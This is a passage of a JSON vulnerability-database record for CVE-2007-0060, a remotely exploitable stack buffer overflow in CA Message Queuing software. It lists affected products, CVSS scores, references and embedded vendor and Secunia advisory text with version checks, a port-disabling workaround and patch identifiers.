"model": "unicenter network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter nsm wireless network management option",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter remote control",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter service level management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter software delivery",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter tng",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4.2"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.1"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter nsm wireless network management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter management for websphere mq",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0.1"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.1"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter management for lotus notes/domino",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter jasmine",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter data transport option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.09"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.07"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.04"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.01"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates cleverpath olap",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.1"
},
{
"model": "associates cleverpath ecm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates advantage data transport",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
}
],
"sources": [
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_portal:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_ecm:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_olap:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_admin:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_asset_management:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_data_transport_option:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:5.0:*:web_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:5.0.1:*:web_servers:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_san_manager:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_aion:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_admin:2.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.0:*:microsoft_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.1:*:microsoft_exchange:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_remote_control:6.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_software_delivery:4.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_asset_management:3.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_jasmine:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_management:4.0:*:lotus_notes_domino:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_nsm_wireless_network_management_option:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_remote_control:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.1:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.4.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:advantage_data_transport:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_predictive_analysis_server:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:cleverpath_predictive_analysis_server:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_application_performance_monitor:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_application_performance_monitor:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_enterprise_job_manager:1.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_enterprise_job_manager:1.0:sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_service_level_management:3.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_software_delivery:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:unicenter_tng:2.2:*:*:ja:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_tng:2.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Paul Mehta",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
],
"trust": 0.6
},
"cve": "CVE-2007-0060",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2007-0060",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-23422",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-0060",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200707-429",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-23422",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. Multiple Computer Associates products are prone to a remote stack-based buffer-overflow vulnerability. This issue affects the Message Queuing (CAM/CAFT) component. The application fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. \nA successful exploit will allow an attacker to execute arbitrary code with SYSTEM-level privileges. There is a buffer overflow vulnerability in the CAM service when processing malformed user requests. Remote attackers may use this vulnerability to control the server. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. Please see\nthe vendor\u0027s advisory for more details. \n\nCAM (Windows):\nhttp://supportconnect.ca.com/sc/redir.jsp?reqPage=search\u0026searchID=QO89945\n\nCAM(Netware):\nhttp://supportconnect.ca.com/sc/redir.jsp?reqPage=search\u0026searchID=QO89943\n\nPROVIDED AND/OR DISCOVERED BY:\nIBM ISS X-Force\n\nORIGINAL ADVISORY:\nCA:\nhttp://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-secnot.asp\n\nIBM ISS X-Force:\nhttp://www.iss.net/threats/272.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nMitigating Factors: None\n\nSeverity: CA has given this vulnerability a High risk rating. \ni.e. CAM versions 1.04, 1.05, 1.06, 1.07, 1.10 (prior to Build \n54_4) and 1.11 (prior to Build 54_4). \n\nAffected Products:\nAdvantage Data Transport 3.0\nBrightStor SAN Manager 11.1, 11.5\nBrightStor Portal 11.1\nCleverPath OLAP 5.1\nCleverPath ECM 3.5\nCleverPath Predictive Analysis Server 2.0, 3.0\nCleverPath Aion 10.0\neTrust Admin 2.01, 2.04, 2.07, 2.09, 8.0, 8.1\nUnicenter Application Performance Monitor 3.0, 3.5\nUnicenter Asset Management 3.1, 3.2, 3.2 SP1, 3.2 SP2, 4.0, \n 4.0 SP1\nUnicenter Data Transport Option 2.0\nUnicenter Enterprise Job Manager 1.0 SP1, 1.0 SP2\nUnicenter Jasmine 3.0\nUnicenter Management for WebSphere MQ 3.5\nUnicenter Management for Microsoft Exchange 4.0, 4.1\nUnicenter Management for Lotus Notes/Domino 4.0\nUnicenter Management for Web Servers 5, 5.0.1\nUnicenter NSM 3.0, 3.1\nUnicenter NSM Wireless Network Management Option 3.0\nUnicenter Remote Control 6.0, 6.0 SP1\nUnicenter Service Level Management 3.0, 3.0.1, 3.0.2, 3.5\nUnicenter Software Delivery 3.0, 3.1, 3.1 SP1, 3.1 SP2, 4.0, \n 4.0 SP1\nUnicenter TNG 2.1, 2.2, 2.4, 2.4.2\nUnicenter TNG JPN 2.2\n\nAffected Platforms:\nWindows and NetWare\n\nPlatforms NOT affected:\nAIX, AS/400, DG Intel, DG Motorola, DYNIX, HP-UX, IRIX, \nLinux Intel, Linux s/390, MVS, Open VMS, OS/2, OSF1, \nSolaris Intel, Solaris Sparc and UnixWare. \n\nStatus and Recommendation:\nCA has made patches available for all affected products. These \npatches are independent of the CA Software that installed CAM. \nSimply select the patch appropriate to the platform, and the \ninstalled version of CAM, and follow the patch application \ninstructions. You should also review the product home pages on \nSupportConnect for any additional product specific instructions. \n\nSolutions for CAM:\nPlatform Solution\nWindows QO89945\nNetWare QO89943\n\nHow to determine if you are affected:\n\nDetermining CAM versions:\nSimply running camstat will return the version information in the \ntop line of the output on any platform. The camstat command is \nlocated in the bin subfolder of the installation directory. \n\nThe example below indicates that CAM version 1.11 build 27 \nincrement 2 is running. \n\n E:\\\u003ecamstat\n CAM \u2013 machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16\n\nDetermining the CAM install directory:\n\nWindows: The install location is specified by the %CAI_MSQ% \n environment variable. \nUnix/Linux/Mac: The /etc/catngcampath text file holds the CAM \n install location. \n\nWorkaround:\nThe affected listening port can be disabled by creating or \nupdating CAM\u0027s configuration file, CAM.CFG, with the following \nentry under the \"*CONFIG\" section:\n\n *CONFIG\n cas_port=0\n\nThe CA Messaging Server must be recycled in order for this to take \neffect. We advise that products dependent upon CAM should be \nshutdown prior to recycling CAM. Once dependent products have \nbeen shutdown, CAM can be recycled with the following commands:\n\n On Windows:\n camclose\n cam start\n\n On NetWare:\n load camclose\n load cam start\n\nOnce CAM has been restarted, any CAM dependent products that were \nshutdown can be restarted. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFGpqCHeSWR3+KUGYURAt6DAJ0YpnaiwrNfhhQlvdvL28LYxBYbZgCfRpKQ\npNdOPBvd1/BVRF6Lo65uo2o=\n=7w0f\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-0060",
"trust": 2.9
},
{
"db": "BID",
"id": "25051",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "26190",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1018449",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2007-2638",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "58025",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-23422",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58028",
"trust": 0.1
},
{
"db": "XF",
"id": "32234",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "PACKETSTORM",
"id": "58028"
},
{
"db": "PACKETSTORM",
"id": "58025"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"id": "VAR-200707-0544",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:46:46.358000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Notice for CA Message Queuing (CAM / CAFT) vulnerability",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=149849"
},
{
"title": "CA Repair Measures for Security Vulnerabilities of Message Queuing Server",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146846"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149809"
},
{
"trust": 1.8,
"url": "http://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-secnot.asp"
},
{
"trust": 1.8,
"url": "http://www.iss.net/threats/272.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/25051"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/474602/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1018449"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/26190"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2007/2638"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32234"
